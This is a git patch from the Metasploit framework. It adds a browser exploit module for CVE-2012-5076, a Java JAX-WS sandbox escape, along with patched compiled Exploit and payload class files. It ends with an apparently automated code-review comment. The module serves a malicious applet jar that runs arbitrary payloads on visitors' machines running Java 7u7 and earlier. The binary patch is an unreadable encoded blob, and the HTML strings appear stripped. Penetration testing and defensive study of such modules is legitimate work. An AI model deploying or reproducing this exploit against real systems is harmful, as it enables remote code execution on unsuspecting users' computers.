From 5076198ba200a43d8ef6e7b0512732549a7a7add Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Sun, 11 Nov 2012 20:18:19 +0100
Subject: [PATCH] fixing bperry comments
---
 data/exploits/cve-2012-5076/Exploit.class | Bin 2295 -> 2213 bytes
 data/exploits/cve-2012-5076/MyPayload.class | Bin 883 -> 706 bytes
 .../exploits/cve-2012-5076/Exploit.java | 3 -
 .../windows/browser/java_jre17_jaxws.rb | 119 ++++++++++++++++++
 4 files changed, 119 insertions(+), 3 deletions(-)
 create mode 100644 modules/exploits/windows/browser/java_jre17_jaxws.rb
diff --git a/data/exploits/cve-2012-5076/Exploit.class b/data/exploits/cve-2012-5076/Exploit.class index a0ac39df1bdc4c63ede3e81f31ef3277a74da001..34c26a171cd56d6caba88dd34e067abd770efdc9 100755 GIT binary patch delta 1225 zcmZ9M+f!Rr6vlr$w-b)1B?-44ODMEy%OwU&OKSsCg@U3$tEphDmxd4^7;-R#3f@v3 zpM2}&!M8qiba19R)5}a?M5-^2Grsg+a2#Lt)i>+fiB!j#Gi$HC*4k@*`&()QMb| zhYjAfSZBlFJ&X7Gz~VzbGALPGRJKRmp zO`ZQ~TB2CU<`)LKrpv#(ers%~@|1OY$MY*|Me$`)%l96*e^ljN-(bmwU*87BahX_T zCy*ZPJfaDCB74NwA*+(r+r5SFjwp(#NIlrlfQLr0JRxIW3!la(HhBg;6%23gJO8A6 zC>*_ileTEM#~WVMU+GE(e;}|;-StbKy4B{xU!%7lC2qzm`T^?XO$0e8xNIrdCh2?k zFexvF_~Dx!%;Xl2O$6JKO5GK#(7p=$;~v`+tx%sFy1~Als5@LCu=(&0ffStFAyi7< zrQs*)Lyg-sCGXL&iBBw{X7?^FTO5dcZLg?yg~#JQ+o!W0^oT3zzDuh<7p|Rat)6R5 zY||DuY{T|Rkezf#6BQ2qKug?j`zy51sBJnn@l4#2JHS`mDsfm;&EgRCB9BP}j(h1$DKKaY&o`kx$QMV^{ ha3|%$o-MrJR||WDSXZ^KjWkJP>HDYuN;JfI@^AC$^wj_W delta 1217 zcmZXU-BTN76vlsVHpv^dOBx7m32hKMq7(wOVkr%jRw~tMQlmj@tRLM%3TZ=#kW^DY z;z#|yV)nudXLP3OaBFpDVMII5c;}t}f}^)yc;k#Sif4gp(b=7|XP!OJbDs0=yYJ^s zzc zx!T0F;j3!4j? zDT`_H&Tnde;vzGOo#|S}t`+C)>Hevry|`#GOFAdJfviYg%LZMPi+a-G@zmT+emAb`iyzXUhSiH$K&07|4^G-ul&cbBHn#qQ*x8CeI6n8bvxleduH3<0*5N|n~rkXmC-aRh5 zIpori^vC=O7c)2ZF^#o5}xk&&b0BEwu|R5tW6 zKH|8DOo+@lpK@wrg@*C33pt?a)AY+qp&5X6N&dyu7Pg3FeO@@|ebz%_!RO57QjE`$ z#L^=w&_tl=m}e%J(Xd+Y4!LwIC=s{F0%sm8A2kFh^Vi9AD3|fatb{Bj7kF|c`f3g5 k&cWk-6(W!QYUbkqlnJ};$;pLmp*smYIQ%Pw`#?qG1GUE#Gynhq delta 456 zcmZvXO-=$q5QSe4Fb(5?{EIrEAP9`;D8?06ki-Pyel!Hp5ePvSZaBlli--#~E?gK_ zUcqCySKq+K7}H5r_p5qeSG@*4)%yF_^9z7|)HQ^#tYHPK5{8B>av_GbAl5bHQIOb> zC`y#vl9>#*#`ft&(;l|%6Q?sP8E&&CHr< false }) + + def initialize( info = {} ) + super( update_info( info, + 'Name' => 'Java Applet JAX-WS Remote Code Execution', + 'Description' => %q{ + This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java + code outside of the sandbox as exploited in the wild in November of 2012. The + vulnerability affects Java version 7u7 and earlier. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability Discovery + 'juan vazquez' # metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5076' ], + [ 'OSVDB', '86363' ], + [ 'BID', '56054' ], + [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ], + [ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ] + ], + 'Platform' => [ 'java', 'win' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'win' + } + ], + [ 'Linux x86', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 16 2012' + )) + end + + + def on_request_uri( cli, request ) + if not request.uri.match(/\.jar$/i) + if not request.uri.match(/\/$/) + send_redirect(cli, get_resource() + '/', '') + return + end + + print_status("#{self.name} handling request") + + send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) + return + end + + paths = [ + [ "Exploit.class" ], + [ "MyPayload.class" ] + ] + + p = regenerate_payload(cli) + + jar = p.encoded_jar + + paths.each do |path| + 1.upto(path.length - 1) do |idx| + full = path[0,idx].join("/") + "/" + if !(jar.entries.map{|e|e.name}.include?(full)) + jar.add_file(full, '') + end + end + fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2012-5076", path ), "rb") + data = fd.read(fd.stat.size) + jar.add_file(path.join("/"), data) + fd.close + end + + print_status("Sending Applet.jar") + send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) + + handler( cli ) + end + + def generate_html + jar_name = rand_text_alpha(rand(6)+3) + ".jar" + html = "" + html += "" + html += "" + html += "" + return html + end + +end
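Review bot: In on_request_uri the per-class read opens the file with `File.open(..., "rb")`, reads it, then calls `fd.close` by hand, so an exception raised by `fd.read` or by `jar.add_file` on the line between them leaves the descriptor open; the block form closes it on every path: `data = File.open(File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076", path), "rb") { |fd| fd.read }` (or `File.binread` with the same path), dropping the separate `fd.close` line. As a point of style, the two `if not request.uri.match(...)` guards in the same method are the `unless` idiom, and `get_resource()` plus the trailing `return html` in generate_html carry parentheses and an explicit return that Ruby does not need. The string literals in generate_html appear here as empty `""`, which looks like markup stripped on rendering rather than the committed code, so the applet tag it emits could not be checked. The hunk header and the top of the new module (its require and class lines) are not legible in the collapsed binary-patch text that precedes this hunk, so that part of the file is unreviewed.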